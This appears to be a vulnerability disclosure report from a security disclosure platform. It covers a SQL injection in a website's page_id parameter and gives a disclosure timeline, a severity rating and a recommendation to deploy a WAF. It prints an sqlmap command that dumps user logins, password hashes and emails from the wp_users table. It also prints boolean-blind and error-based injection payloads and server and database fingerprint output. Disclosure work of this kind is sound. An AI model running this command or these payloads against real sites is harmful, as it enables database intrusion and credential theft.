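2015-12-01: Details reported to the vendor; awaiting vendor response
2015-12-01: Vendor confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and relevant domain experts
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to trainee white hats
2016-01-15: Details disclosed to the public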
Each of the 50 most-moved stocks has its own story; we break down the plot behind the exciting stories for you.
URL: http://**.**.**.**/?page_id=3572
$ python sqlmap.py -u "http://**.**.**.**/?page_id=3572" -p page_id --technique=BE --random-agent --batch -D Topic -T wp_users -C user_login,user_pass,user_email --dump
---
Parameter: page_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page_id=3572 AND 4735=4735

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: page_id=3572 AND (SELECT 8111 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8111=8111,1))),0x716a786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'topicadm@%'
current user is DBA: False
database management system users [1]:
[*] 'topicadm'@'%'
Deploy a WAF.
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-12-01 16:38
Referred to related parties.
None at this time.